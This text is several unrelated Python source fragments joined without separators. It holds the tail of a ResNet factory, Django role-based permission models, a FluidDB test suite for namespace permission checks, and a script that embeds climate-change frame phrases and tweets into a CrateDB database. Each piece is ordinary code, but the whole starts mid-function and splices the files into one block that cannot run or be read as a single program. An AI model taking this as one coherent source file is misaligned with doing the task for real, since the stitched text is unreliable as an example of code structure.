    """ResNet-152: BottleNeck, stages of 3/8/36/3 blocks."""
    return ResNet('BottleNeck', [3, 8, 36, 3], **kwargs)
def resnet(**kwargs):
    """Generic factory: forwards all keyword arguments to ResNet."""
    return ResNet(**kwargs)
from django.db import models
# Create your models here.
class Menu(models.Model):
    """Navigation menu entry that permissions can be attached to."""
    title = models.CharField(max_length=32)
    weight = models.IntegerField(default=1)  # ordering weight — TODO confirm sort direction
    icon = models.CharField(max_length=64)

    def __str__(self):
        return self.title
class Permission(models.Model):
    """URL-based permission; optionally attached to a menu and nested
    under a parent permission."""
    url = models.CharField(max_length=64, verbose_name='权限')
    title = models.CharField(max_length=32, verbose_name='标题')
    name = models.CharField(max_length=32, verbose_name='URL别名', unique=True)
    # NOTE(review): ForeignKey without on_delete implies Django < 2.0.
    menu = models.ForeignKey(Menu, blank=True, null=True)
    parent = models.ForeignKey('Permission', blank=True, null=True)

    def __str__(self):
        return self.title
class Role(models.Model):
    """RBAC role: a named bundle of permissions assigned to users."""
    name = models.CharField(max_length=64, verbose_name='名称')
    permissions = models.ManyToManyField('Permission',verbose_name='角色所拥有的权限',blank=True)

    def __str__(self):
        return self.name
class RbacUser(models.Model):
    """
    User table (abstract RBAC base: concrete user models inherit from it).
    """
    # username = models.CharField(max_length=32, verbose_name='用户名')
    # password = models.CharField(max_length=32, verbose_name='密码')
    roles = models.ManyToManyField(Role, verbose_name='用户所拥有的角色', blank=True)

    class Meta:
        abstract = True  # abstract base: no table is created on migration; inherit to use
from fluiddb.cache.permission import CachingPermissionAPI
from fluiddb.cache.test.test_namespace import CachingNamespaceAPITestMixin
from fluiddb.data.permission import Operation, Policy
from fluiddb.data.system import createSystemData
from fluiddb.model.exceptions import UnknownPathError
from fluiddb.model.test.test_namespace import NamespaceAPITestMixin
from fluiddb.model.user import UserAPI, getUser
from fluiddb.security.exceptions import PermissionDeniedError
from fluiddb.security.namespace import SecureNamespaceAPI
from fluiddb.testing.basic import FluidinfoTestCase
from fluiddb.testing.resources import (
BrokenCacheResource, CacheResource, ConfigResource, DatabaseResource,
LoggingResource)
class SecureNamespaceAPITestMixin(object):
    """Shared unknown-path failure tests for L{SecureNamespaceAPI}.

    Host test cases must provide C{self.namespaces}, a
    L{SecureNamespaceAPI} instance.
    """

    def testCreateWithUnknownParent(self):
        """
        L{SecureNamespaceAPI.create} raises an L{UnknownPathError} exception if
        an attempt to create a L{Namespace} with an unknown parent is made.
        """
        values = [(u'unknown/namespace', u'An unknown namespace.')]
        error = self.assertRaises(UnknownPathError,
                                  self.namespaces.create, values)
        self.assertEqual([u'unknown'], error.paths)

    def testDeleteWithUnknownPath(self):
        """
        L{SecureNamespaceAPI.delete} raises an L{UnknownPathError} if a path
        for an unknown L{Namespace} is specified.
        """
        error = self.assertRaises(UnknownPathError,
                                  self.namespaces.delete,
                                  [u'unknown/namespace'])
        self.assertEqual([u'unknown/namespace'], error.paths)

    def testSetWithUnknownPath(self):
        """
        L{SecureNamespaceAPI.set} raises an L{UnknownPathError} if a path for
        an unknown L{Namespace} is specified.
        """
        values = {u'unknown/namespace': u'An unknown namespace.'}
        error = self.assertRaises(UnknownPathError,
                                  self.namespaces.set, values)
        self.assertEqual([u'unknown/namespace'], error.paths)
class SecureNamespaceAPITest(NamespaceAPITestMixin,
                             CachingNamespaceAPITestMixin,
                             SecureNamespaceAPITestMixin,
                             FluidinfoTestCase):
    """Runs the namespace API suites as a normal user with a working cache."""

    resources = [('cache', CacheResource()),
                 ('config', ConfigResource()),
                 ('store', DatabaseResource())]

    def setUp(self):
        super(SecureNamespaceAPITest, self).setUp()
        self.system = createSystemData()
        UserAPI().create([(u'username', u'password', u'User',
                           u'user@example.com')])
        self.user = getUser(u'username')
        self.namespaces = SecureNamespaceAPI(self.user)
        self.permissions = CachingPermissionAPI(self.user)
class SecureNamespaceAPIWithBrokenCacheTest(NamespaceAPITestMixin,
                                            SecureNamespaceAPITestMixin,
                                            FluidinfoTestCase):
    """Same suites, but with a broken cache to prove graceful degradation."""

    resources = [('cache', BrokenCacheResource()),
                 ('config', ConfigResource()),
                 ('log', LoggingResource()),
                 ('store', DatabaseResource())]

    def setUp(self):
        super(SecureNamespaceAPIWithBrokenCacheTest, self).setUp()
        self.system = createSystemData()
        UserAPI().create([(u'username', u'password', u'User',
                           u'user@example.com')])
        self.user = getUser(u'username')
        self.namespaces = SecureNamespaceAPI(self.user)
        self.permissions = CachingPermissionAPI(self.user)
class SecureNamespaceAPIWithAnonymousRoleTest(FluidinfoTestCase):
    """Permission checks for the anonymous user: all writes are denied,
    reads follow the LIST_NAMESPACE permission."""

    resources = [('cache', CacheResource()),
                 ('config', ConfigResource()),
                 ('store', DatabaseResource())]

    def setUp(self):
        super(SecureNamespaceAPIWithAnonymousRoleTest, self).setUp()
        self.system = createSystemData()
        self.user = self.system.users[u'anon']
        self.namespaces = SecureNamespaceAPI(self.user)

    def testCreateIsDenied(self):
        """
        L{SecureNamespaceAPI.create} raises a L{PermissionDeniedError} if it's
        invoked by a L{User} with the L{Role.ANONYMOUS}.
        """
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.create,
                                  [(u'anon/test', u'description')])
        self.assertEqual(self.user.username, error.username)
        self.assertEqual([(u'anon', Operation.CREATE_NAMESPACE)],
                         sorted(error.pathsAndOperations))

    def testDeleteIsDenied(self):
        """
        L{SecureNamespaceAPI.delete} raises a L{PermissionDeniedError} if it's
        invoked by a L{User} with the L{Role.ANONYMOUS}.
        """
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.delete,
                                  [u'anon'])
        self.assertEqual(self.user.username, error.username)
        self.assertEqual([(u'anon', Operation.DELETE_NAMESPACE)],
                         sorted(error.pathsAndOperations))

    def testSetIsDenied(self):
        """
        L{SecureNamespaceAPI.set} raises a L{PermissionDeniedError} if it's
        invoked by a L{User} with the L{Role.ANONYMOUS}.
        """
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.set,
                                  {u'anon': u'new description'})
        self.assertEqual(self.user.username, error.username)
        self.assertEqual([(u'anon', Operation.UPDATE_NAMESPACE)],
                         sorted(error.pathsAndOperations))

    def testGetChildNamespacesIsAllowed(self):
        """
        L{SecureNamespaceAPI.get} should allow getting a list of child
        namespaces if the I{anon} user has permissions.
        """
        admin = self.system.users[u'fluiddb']
        SecureNamespaceAPI(admin).create([(u'fluiddb/test', u'description')])
        values = [(u'fluiddb', Operation.LIST_NAMESPACE, Policy.OPEN, [])]
        CachingPermissionAPI(admin).set(values)
        result = self.namespaces.get([u'fluiddb'], withNamespaces=True)
        self.assertEqual(1, len(result))

    def testGetChildNamespacesIsDenied(self):
        """
        L{SecureNamespaceAPI.get} should raise L{PermissionDeniedError} if the
        I{anon} user doesn't have LIST permissions when trying to get the child
        namespaces.
        """
        admin = self.system.users[u'fluiddb']
        SecureNamespaceAPI(admin).create([(u'fluiddb/test', u'description')])
        values = [(u'fluiddb', Operation.LIST_NAMESPACE, Policy.CLOSED, [])]
        CachingPermissionAPI(admin).set(values)
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.get,
                                  [(u'fluiddb')], withNamespaces=True)
        self.assertEqual([(u'fluiddb', Operation.LIST_NAMESPACE)],
                         sorted(error.pathsAndOperations))

    def testGetChildTagsIsAllowed(self):
        """
        L{SecureNamespaceAPI.get} should allow getting a list of child tags if
        the I{anon} user has permissions.
        """
        admin = self.system.users[u'fluiddb']
        SecureNamespaceAPI(admin).create([(u'fluiddb/test', u'description')])
        # CLOSED policy, but anon is on the exception list, so access is granted.
        values = [(u'fluiddb', Operation.LIST_NAMESPACE,
                   Policy.CLOSED, [u'anon'])]
        CachingPermissionAPI(admin).set(values)
        result = self.namespaces.get([u'fluiddb'], withTags=True)
        self.assertEqual(1, len(result))

    def testGetChildTagsIsDenied(self):
        """
        L{SecureNamespaceAPI.get} should raise L{PermissionDeniedError} if the
        L{anon} user doesn't have LIST permissions when trying to get the
        child tags.
        """
        admin = self.system.users[u'fluiddb']
        SecureNamespaceAPI(admin).create([(u'fluiddb/test', u'description')])
        # OPEN policy, but anon is on the exception list, so access is denied.
        values = [(u'fluiddb', Operation.LIST_NAMESPACE,
                   Policy.OPEN, [u'anon'])]
        CachingPermissionAPI(admin).set(values)
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.get,
                                  [(u'fluiddb')], withTags=True)
        self.assertEqual([(u'fluiddb', Operation.LIST_NAMESPACE)],
                         sorted(error.pathsAndOperations))
class SecureNamespaceAPIWithNormalUserTest(FluidinfoTestCase):
    """Permission checks for an ordinary user: each operation is allowed or
    denied strictly by the namespace's permission policy."""

    resources = [('cache', CacheResource()),
                 ('config', ConfigResource()),
                 ('store', DatabaseResource())]

    def setUp(self):
        super(SecureNamespaceAPIWithNormalUserTest, self).setUp()
        createSystemData()
        UserAPI().create([(u'user', u'password', u'User',
                           u'user@example.com')])
        self.user = getUser(u'user')
        self.permissions = CachingPermissionAPI(self.user)
        self.namespaces = SecureNamespaceAPI(self.user)

    def testCreateIsAllowed(self):
        """
        L{SecureNamespaceAPI.create} should allow the creation of namespaces
        whose parent has open CREATE permissions.
        """
        values = [(u'user', Operation.CREATE_NAMESPACE, Policy.OPEN, [])]
        self.permissions.set(values)
        result = self.namespaces.create([(u'user/test', u'description')])
        self.assertEqual(1, len(result))

    def testCreateIsDenied(self):
        """
        L{SecureNamespaceAPI.create} should raise L{PermissionDeniedError} if
        the user doesn't have CREATE permissions on the parent namespace.
        """
        values = [(u'user', Operation.CREATE_NAMESPACE, Policy.CLOSED, [])]
        self.permissions.set(values)
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.create,
                                  [(u'user/test', u'description')])
        self.assertEqual([(u'user', Operation.CREATE_NAMESPACE)],
                         sorted(error.pathsAndOperations))

    def testDeleteIsAllowed(self):
        """
        L{SecureNamespaceAPI.delete} should allow the deletion of a namespace
        if the user has DELETE permissions.
        """
        result1 = self.namespaces.create([(u'user/test', u'description')])
        values = [(u'user/test', Operation.DELETE_NAMESPACE, Policy.OPEN, [])]
        self.permissions.set(values)
        result2 = self.namespaces.delete([u'user/test'])
        self.assertEqual(result1, result2)

    def testDeleteIsDenied(self):
        """
        L{SecureNamespaceAPI.delete} should raise L{PermissionDeniedError} if
        the user doesn't have DELETE permissions.
        """
        self.namespaces.create([(u'user/test', u'description')])
        # OPEN policy, but the user is on the exception list, so it's denied.
        values = [(u'user/test', Operation.DELETE_NAMESPACE,
                   Policy.OPEN, [u'user'])]
        self.permissions.set(values)
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.delete, [(u'user/test')])
        self.assertEqual([(u'user/test', Operation.DELETE_NAMESPACE)],
                         sorted(error.pathsAndOperations))

    def testGetChildNamespacesIsAllowed(self):
        """
        L{SecureNamespaceAPI.get} should allow getting a list of child
        namespaces if the user has permissions.
        """
        self.namespaces.create([(u'user/test', u'description')])
        values = [(u'user', Operation.LIST_NAMESPACE, Policy.OPEN, [])]
        self.permissions.set(values)
        result = self.namespaces.get([u'user'], withNamespaces=True)
        self.assertEqual(1, len(result))

    def testGetChildNamespacesIsDenied(self):
        """
        L{SecureNamespaceAPI.get} should raise L{PermissionDeniedError} if the
        user doesn't have LIST permissions when trying to get the child
        namespaces.
        """
        self.namespaces.create([(u'user/test', u'description')])
        values = [(u'user', Operation.LIST_NAMESPACE, Policy.CLOSED, [])]
        self.permissions.set(values)
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.get,
                                  [(u'user')], withNamespaces=True)
        self.assertEqual([(u'user', Operation.LIST_NAMESPACE)],
                         sorted(error.pathsAndOperations))

    def testGetChildTagsIsAllowed(self):
        """
        L{SecureNamespaceAPI.get} should allow getting a list of child tags if
        the user has permissions.
        """
        self.namespaces.create([(u'user/test', u'description')])
        # CLOSED policy, but the user is on the exception list, so allowed.
        values = [(u'user', Operation.LIST_NAMESPACE,
                   Policy.CLOSED, [u'user'])]
        self.permissions.set(values)
        result = self.namespaces.get([u'user'], withTags=True)
        self.assertEqual(1, len(result))

    def testGetChildTagsIsDenied(self):
        """
        L{SecureNamespaceAPI.get} should raise L{PermissionDeniedError} if the
        user doesn't have LIST permissions when trying to get the child
        tags.
        """
        self.namespaces.create([(u'user/test', u'description')])
        # OPEN policy, but the user is on the exception list, so denied.
        values = [(u'user', Operation.LIST_NAMESPACE, Policy.OPEN, [u'user'])]
        self.permissions.set(values)
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.get,
                                  [(u'user')], withTags=True)
        self.assertEqual([(u'user', Operation.LIST_NAMESPACE)],
                         sorted(error.pathsAndOperations))

    def testSetIsAllowed(self):
        """
        L{SecureNamespaceAPI.set} should allow updating the description of a
        namespace if the user has permissions.
        """
        self.namespaces.create([(u'user/test', u'description')])
        values = [(u'user/test', Operation.UPDATE_NAMESPACE, Policy.OPEN, [])]
        self.permissions.set(values)
        self.namespaces.set({u'user/test': u'description'})

    def testSetIsDenied(self):
        """
        L{SecureNamespaceAPI.set} should raise L{PermissionDeniedError} if the
        user doesn't have UPDATE permissions when trying to update a
        namespace's description.
        """
        self.namespaces.create([(u'user/test', u'description')])
        values = [(u'user/test', Operation.UPDATE_NAMESPACE,
                   Policy.CLOSED, [])]
        self.permissions.set(values)
        error = self.assertRaises(PermissionDeniedError,
                                  self.namespaces.set,
                                  {u'user/test': u'description'})
        self.assertEqual([(u'user/test', Operation.UPDATE_NAMESPACE)],
                         sorted(error.pathsAndOperations))
class SecureNamespaceAPIWithSuperuserTest(FluidinfoTestCase):
    """Superusers bypass permission checks: every operation succeeds even
    when the relevant permission is CLOSED."""

    resources = [('cache', CacheResource()),
                 ('config', ConfigResource()),
                 ('store', DatabaseResource())]

    def setUp(self):
        super(SecureNamespaceAPIWithSuperuserTest, self).setUp()
        system = createSystemData()
        user = system.users[u'fluiddb']
        self.namespaces = SecureNamespaceAPI(user)
        self.permissions = CachingPermissionAPI(user)

    def testCreateIsAllowed(self):
        """
        Creating a new L{Namespace} should be allowed if we're a user with a
        L{Role.SUPERUSER} no matter what permissions we have.
        """
        values = [(u'fluiddb', Operation.CREATE_NAMESPACE, Policy.CLOSED, [])]
        self.permissions.set(values)
        result = self.namespaces.create([(u'fluiddb/test', u'description')])
        self.assertEqual(1, len(result))

    def testDeleteIsAllowed(self):
        """
        Deleting a L{Namespace} should be allowed if we're a user with a
        L{Role.SUPERUSER} no matter what permissions we have.
        """
        result1 = self.namespaces.create([(u'fluiddb/test', u'description')])
        values = [(u'fluiddb/test', Operation.DELETE_NAMESPACE,
                   Policy.CLOSED, [])]
        self.permissions.set(values)
        result2 = self.namespaces.delete([u'fluiddb/test'])
        self.assertEqual(result1, result2)

    def testSetIsAllowed(self):
        """
        Updating a L{Namespace} should be allowed if we're a user with a
        L{Role.SUPERUSER} no matter what permissions we have.
        """
        self.namespaces.create([(u'fluiddb/test', u'description')])
        values = [(u'fluiddb/test', Operation.UPDATE_NAMESPACE,
                   Policy.CLOSED, [])]
        self.permissions.set(values)
        self.namespaces.set({u'fluiddb/test': u'new description'})

    def testGetIsAllowed(self):
        """
        Getting information about a L{Namespace} should be allowed if we're a
        user with a L{Role.SUPERUSER} no matter what permissions we have.
        """
        self.namespaces.create([(u'fluiddb/test', u'description')])
        values = [(u'fluiddb/test', Operation.LIST_NAMESPACE,
                   Policy.CLOSED, [])]
        self.permissions.set(values)
        result = self.namespaces.get([u'fluiddb'], withDescriptions=False,
                                     withTags=True, withNamespaces=True)
        self.assertEqual(1, len(result))
|
"""
Description of frames from Table S2 in "Supplementary Information for Dominant Frames in Legacy and Social Media
Coverage of the IPCC Fifth Assessment Report"
Some description has been left out like mentions of other frames, punctuation removed, everything lowercased,
entities joined by _
ss Settled Science
us Uncertain (and contested) Science
pis Political or Ideological Struggle
d Disaster
o1 & o2 Opportunity
e1 & e2 Economic
me1 & me2 Morality and Ethics
ros Role of Science
s Security
h Health
column 1 socio-political context of frame
column 2 problem definition, moral judgement, remedy
column 3 typical sources
column 4 themes or storylines
column 5 language, metaphors, phrases
column 6 visual imagery
"""
import json
import time
from sentence_transformers import SentenceTransformer
from redditscore.tokenizer import CrazyTokenizer
from nltk.tokenize import sent_tokenize
import os
import tensorflow as tf
from tweet_parser.tweet import Tweet
import pandas as pd
from sqlalchemy.dialects.postgresql import ARRAY
from crate.client.sqlalchemy.types import Object
from sqlalchemy.types import String, DateTime, Float
import numpy as np
from tqdm import tqdm
import tensorflow_hub as hub
import pickle
import emoji
import re
pd.set_option('display.max_columns', None)
np.set_printoptions(threshold=np.prod((10, 1050)))
use_embed = hub.load("https://tfhub.dev/google/universal-sentence-encoder/4")
roberta_model = SentenceTransformer('roberta-large-nli-stsb-mean-tokens')
rule_poli = re.compile(r'[pP][oO][lL][iI]')
rule_govt = re.compile(r'[gG][oO][vV][tT]')
rule_2c = re.compile(r"""\d+[cC] | # e.g. 2c
\d+\.\d+[cC] | # e.g. 1.5C
\d+º[cC] | # e.g. 2ºC
\d+\.\d+º[cC] # e.g. 1.5ºc
""", re.X)
rule_mdg = re.compile(r'[mM][dD][gG][sS]|[mM][dD][gG]')
rule_ipcc = re.compile(r'[iI][pP][cC][cC]')
rule_un = re.compile(r'\s[uU][nN]\s')
rule_who = re.compile(r'\s[W][H][O]\s')
extra_patterns = [(rule_2c, ' degree celsius '),
(rule_mdg, ' Millennium Development Goal '),
(rule_poli, ' politics '),
(rule_govt, ' government '),
(rule_ipcc, ' Intergovernmental Panel on Climate Change '),
(rule_un, ' United Nations '),
(rule_who, ' World Health Organization ')]
phrase_tokenizer = CrazyTokenizer(lowercase=False,
keepcaps=True,
hashtags='split',
remove_punct=False,
decontract=True,
# extra_patterns=extra_patterns,
twitter_handles='',
urls='',
whitespaces_to_underscores=False)
def phrase_tokenize(text):
    """Split *text* into sentences and tokenize each one.

    Each sentence is run through the module-level ``extra_patterns``
    substitutions, tokenized with ``phrase_tokenizer``, and emoji tokens are
    replaced by their demojized names with underscores turned into spaces.

    Returns a dict mapping ``'sentence_<i>'`` to
    ``{'tokens': [...], 'phrase': '<tokens joined by spaces>'}``.
    """
    all_phrases = {}
    # enumerate() instead of indexing into the list (idiomatic, same order).
    for i, phrase in enumerate(sent_tokenize(text)):
        for pattern, replacement in extra_patterns:
            phrase = re.sub(pattern, replacement, phrase)
        tokens = phrase_tokenizer.tokenize(phrase)
        tokens = [token if not emoji.is_emoji(token)
                  else token.strip(':').replace('_', ' ') for token in tokens]
        all_phrases['sentence_{}'.format(i)] = {'tokens': tokens,
                                                'phrase': ' '.join(tokens)}
    return all_phrases
def check_array_size(a):
    """Warn when the UTF-8 encoding of string *a* reaches 32766 bytes.

    32766 is Lucene's limit for a single indexed term, so larger values
    would be problematic for the CrateDB columns these strings feed.
    The original used ``assert`` inside a bare ``except`` — the assert is
    stripped under ``python -O`` and the bare except swallows everything;
    an explicit check preserves the same observable behavior (print and
    continue) without those pitfalls.
    """
    size = len(a.encode('utf-8'))
    if size >= 32766:
        print("size: ", size)
# Frames and their elements from Table S2 (see module docstring). Keeping the
# element texts grouped by frame makes this the single source of truth: the
# original duplicated the per-frame counts in three places (frame_list
# multipliers, element_id_list ranges, and the implicit grouping of
# element_list), which could silently drift apart when elements are edited.
_FRAMES = [
    ('settled_science', [
        "there is broad expert scientific consensus",
        "considerable evidence of the need for action",
        "science has spoken",
        "politicians must act in terms of global agreements",
        "exhaustive Intergovernmental Panel on Climate Change report produced by thousands of expert scientists",
        "unprecedented rate of change compared to paleo records",
        "carbon budget emissions allowance in order to meet 2 degrees celsius policy target",
        "severe and irreversible impacts",
        "trust climate scientists and dismiss skeptic voices",
        "settled science",
        "unequivocal nature of anthropogenic climate change",
        "landmark report by Intergovernmental Panel on Climate Change",
        "the balance of evidence",
        "what more proof do we need",
        "greatest challenge of our time",
        "skeptics wishful thinking or malpractice",
        "go read the Intergovernmental Panel on Climate Change report",
        "citing sources of information",
    ]),
    ('uncertain_science', [
        "there is still a lack of scientific evidence to justify action",
        "uncertainty in climate science impacts or solutions",
        "question anthropogenic nature of climate change",
        "natural variability",
        "science has been wrong before and still lacks knowledge",
        "we cannot should not or will struggle to act",
        "unexplained pause in global mean temperature warming",
        "Climatic Research Unit stolen emails",
        "climategate",
        "errors in Intergovernmental Panel on Climate Change",
        "a pause in warming or slowdown",
        "we cannot be sure despite scientists best efforts",
        "scientists making errors or mistakes",
        "hysteria and silliness",
        "scientists admit or insist or are puzzled",
        "scientists attempt to prove climate change",
        "global warming believers",
        "climate change hoax",
    ]),
    ('political_or_ideological_struggle', [
        "a political or ideological conflict over the way the world should work",
        "conflict over solutions or strategy to address issues",
        "a battle for power between nations groups or personalities",
        "detail of specific policies",
        "green new deal",
        "climate change act",
        "disagreement over policies and policy detail",
        "questioning the motives or funding of opponents",
        "a battle or war or fierce debate of ideas",
        "government strategy confused",
        "how can the other political side ignore these scientific truths and not act",
    ]),
    ('disaster', [
        "predicted impacts are dire with severe consequences",
        "impacts are numerous and threaten all aspects of life",
        "impacts will get worse and we are not well prepared",
        "unprecedented rise in global average surface temperature",
        "sea level rise",
        "snow and ice decline",
        "decline in coral reefs",
        "extreme weather including droughts heatwaves floods",
        "scale of the challenge is overwhelming",
        "positively frightening",
        "unnatural weather",
        "weather on steroids",
        "violent or extreme weather",
        "runaway climate change",
        "life is unsustainable",
        "threatened species or ecosystems",
        "disaster-stricken people",
        "entire ecosystems are collapsing",
    ]),
    ('opportunity', [
        "climate change poses opportunities",
        "reimagine how we live",
        "further human development",
        "invest in co-benefits",
        "climate change is rich with opportunity",
        "time for innovation or creativity",
        "improve lives now and in the future",
        "take personal action",
        "change in lifestyle choices",
        "change diet go vegan or vegetarian",
        "eco-friendly and sustainable cities and management",
        "eco-friendly and sustainable lifestyle",
        "reduce carbon footprint",
        "adapt to challenges",
        "adaptation strategies",
        "carbon dioxide fertilization for agriculture",
        "beneficial impacts of changing climate",
        "no intervention needed",
        "melting arctic will lead to opening up of shipping routes",
        "new trade opportunities",
        "increased agricultural productivity through increasing atmospheric carbon dioxide fertilization",
        "opportunity to transform trade",
        "increased resource extraction",
    ]),
    ('economic', [
        "economic growth prosperity investments and markets",
        "high monetary costs of inaction",
        "the economic case provides a strong argument for action now",
        "divestment from fossil fuels like oil and gas",
        "cost of mitigating climate change is high but the cost will be higher if we do not act now",
        "action now can create green jobs",
        "economic growth and prosperity",
        "costs and economic estimates",
        "billions of dollars of damage in the future if no action is taken now",
        "it will not cost the world to save the planet",
        "high monetary costs of action",
        "action is hugely expensive or simply too costly in the context of other priorities",
        "scientific uncertainty",
        "United Nations is proposing climate plans which will damage economic growth",
        "action at home now is unfair as Annex II countries will gain economic advantage",
        "action will damage economic growth",
        "it is no time for panicky rearranging of the global economy",
        "killing industry",
        "imposing costly energy efficiency requirements",
    ]),
    ('morality_and_ethics', [
        "an explicit and urgent moral religious or ethical call for action",
        "strong mitigation and protection of the most vulnerable",
        "God ethics and morality",
        "climate change linked to poverty",
        "ending world hunger",
        "Millennium Development Goal",
        "exert moral pressure",
        "degradation of nature",
        "ruining the planet or creation",
        "people or nations at the front line of climate change for the most vulnerable and already exposed",
        "responsibility to protect nature",
        "there is no planet B",
        "globalist climate change religion",
    ]),
    ('role_of_science', [
        "process or role of science in society",
        "how the Intergovernmental Panel on Climate Change works or does not",
        "transparency in funding",
        "awareness of science",
        "institutions involving scientists like the Intergovernmental Panel on Climate Change",
        "public opinion understanding and knowledge",
        "bias in media sources",
        "giving contrarians a voice",
        "not broadcasting diverse views",
        "Intergovernmental Panel on Climate Change is a leading institution",
        "politicisation of science",
        "Intergovernmental Panel on Climate Change is too conservative or alarmist",
        "detail how Intergovernmental Panel on Climate Change process works",
        "amount of time and space given to contrarians or skeptics in the media",
        "threats to free speech",
        "false balance",
        "balance as bias",
        "sexed up science",
        "belief in scientists as a new priesthood of the truth",
        "misinformation and propaganda",
        "fake news media",
        "hidden agenda and mainstream narrative",
        "suppression of information",
        "conflict of interest",
    ]),
    ('security', [
        "threat to human energy",
        "threat to water supply",
        "threat to food security",
        "threats to the nation state especially over migration",
        "conflict might be local but could be larger in scale and endanger many",
        "conflicts may occur between developed and developing countries",
        "conflict between nature and humans",
        "conflict between different stakeholders in developed nations",
        "climate change as a threat multiplier",
        "increase in instability volatility and tension",
        "fighting for water security",
        "a danger to world peace",
        "impacts on security usually related to food drought or migration",
        "armed forces preparing for war",
        "people are being displaced",
    ]),
    ('health', [
        "severe danger to human health",
        "deaths from malnutrition",
        "deaths from insect-borne diseases",
        "poor air quality",
        "urgent mitigation and adaptation required",
        "vulnerability of Annex II countries",
        "vulnerability of children and elders to health impacts",
        "details of health impacts from climate change",
        "health wellbeing livelihoods and survival are compromised",
        "financial cost of impacts to human health",
        "mental health issues",
        "worsening environmental and air pollution",
        "climate change is a global problem and affects everyone",
    ]),
]

# Flat, parallel lists (same values and order as before): frame name per
# element, element index within its frame, and the element text itself.
frame_list = [name for name, elements in _FRAMES for _ in elements]
element_id_list = [i for _, elements in _FRAMES for i in range(len(elements))]
element_list = [element for _, elements in _FRAMES for element in elements]
# Embed every frame element once with both encoders; the L2-normalized RoBERTa
# variant lets cosine similarity be computed with a plain dot product.
element_use = use_embed(element_list).numpy()
element_roberta = roberta_model.encode(element_list)
element_roberta_norm = tf.keras.utils.normalize(element_roberta, axis=-1, order=2)

# Persist the frame elements plus their embeddings to CrateDB.
frames = {
    "element_id": element_id_list,
    "frame": frame_list,
    "element_txt": element_list,
    "element_use": element_use.tolist(),
    "element_roberta": element_roberta.tolist(),
    "element_roberta_norm": element_roberta_norm.tolist()
}
element_df = pd.DataFrame(frames)
element_df.to_sql('frame_elements', 'crate://localhost:4200', if_exists='append', index=False, dtype={
    'element_use': ARRAY(Float),
    'element_roberta': ARRAY(Float),
    'element_roberta_norm': ARRAY(Float)
})
# Per-tweet column accumulators; flushed to CrateDB every 50 accepted tweets.
(ids, table, split, created_at_datetime,
 screen_name, bio, txt, processed) = ([] for _ in range(8))
(use_embeddings, use_median, use_avg) = ([] for _ in range(3))
(roberta_embeddings, roberta_median, roberta_avg) = ([] for _ in range(3))
(roberta_embeddings_norm, roberta_median_norm,
 roberta_avg_norm) = ([] for _ in range(3))
# Stream tweets from disk, embed each non-empty English tweet sentence by
# sentence, and bulk-insert into CrateDB in batches of 50 rows.
with open('sample.jsonl', 'r') as infile:
    for line in tqdm(infile, desc='tweets'):
        start_time = time.time()
        tweet_dict = json.loads(line)
        tweet = Tweet(tweet_dict)
        if tweet.user_entered_text != '' and tweet.lang == 'en':
            ids.append(tweet.id)
            table.append('climate_tweets')
            split.append('sample')
            created_at_datetime.append(tweet.created_at_datetime)
            screen_name.append(tweet.screen_name)
            bio.append(tweet.bio)
            txt.append(tweet.user_entered_text)
            p = phrase_tokenize(tweet.user_entered_text)
            processed.append(json.dumps(p))
            # One cleaned string per sentence; the comprehension variable
            # shadows `s` but the final value is the list of phrases.
            s = [p[s]['phrase'] for s in p]
            ue = use_embed(s).numpy()
            # Arrays are stored as their textual repr (np.array_repr); the
            # module-level set_printoptions prevents element elision.
            use_embeddings.append(np.array_repr(ue))
            # use_embeddings.append(ue.tolist())
            use_median.append(np.array_repr(np.median(ue, axis=0)))
            # use_median.append(np.median(ue, axis=0).tolist())
            use_avg.append(np.array_repr(np.average(ue, axis=0)))
            # use_avg.append(np.average(ue, axis=0).tolist())
            rob = roberta_model.encode(s)
            roberta_embeddings.append(np.array_repr(rob))
            # roberta_embeddings.append(rob.tolist())
            # print(rob.shape)
            rob_med = np.median(rob, axis=0)
            roberta_median.append(np.array_repr(rob_med))
            # roberta_median.append(rob_med.tolist())
            # print(rob_med.shape)
            rob_avg = np.average(rob, axis=0)
            # print(rob_avg.shape)
            roberta_avg.append(np.array_repr(rob_avg))
            # roberta_avg.append(rob_avg.tolist())
            rob_norm = tf.keras.utils.normalize(rob, axis=-1, order=2)
            # print(rob_norm.shape)
            roberta_embeddings_norm.append(np.array_repr(rob_norm))
            # normalize() returns 2-D output, so flatten back to a vector.
            rob_med_norm = tf.keras.utils.normalize(rob_med, axis=-1, order=2).flatten()
            # print(rob_med_norm.shape)
            roberta_median_norm.append(np.array_repr(rob_med_norm))
            rob_avg_norm = tf.keras.utils.normalize(rob_avg, axis=-1, order=2).flatten()
            roberta_avg_norm.append(np.array_repr(rob_avg_norm))
            # print(rob_avg_norm.shape)
            # Flush a full batch of 50 rows and reset the accumulators.
            if len(ids) == 50:
                tweets_df = pd.DataFrame({
                    'id': ids,
                    'table_name': table,
                    'split': split,
                    'created_at_datetime': created_at_datetime,
                    'screen_name': screen_name,
                    'bio': bio,
                    'txt': txt,
                    'txt_clean_sentences': processed,
                    'txt_clean_use': use_embeddings,
                    'use_median': use_median,
                    'use_average': use_avg,
                    'txt_clean_roberta': roberta_embeddings,
                    'roberta_median': roberta_median,
                    'roberta_average': roberta_avg,
                    'txt_clean_roberta_norm': roberta_embeddings_norm,
                    'roberta_norm_median': roberta_median_norm,
                    'roberta_norm_average': roberta_avg_norm
                })
                # Warn (prints only) when a serialized array would exceed
                # Lucene's 32766-byte indexed-term limit.
                tweets_df['txt_clean_roberta'].apply(check_array_size)
                tweets_df['txt_clean_roberta_norm'].apply(check_array_size)
                tweets_df.to_sql('climate_tweets', 'crate://localhost:4200', if_exists='append', index=False,
                                 dtype={'created_at_datetime': DateTime,
                                        'txt_clean_sentences': Object})
                ids = []
                table = []
                split = []
                created_at_datetime = []
                screen_name = []
                bio = []
                txt = []
                processed = []
                sentences = []  # NOTE(review): never read anywhere — leftover?
                use_embeddings = []
                use_median = []
                use_avg = []
                roberta_embeddings = []
                roberta_median = []
                roberta_avg = []
                roberta_embeddings_norm = []
                roberta_median_norm = []
                roberta_avg_norm = []
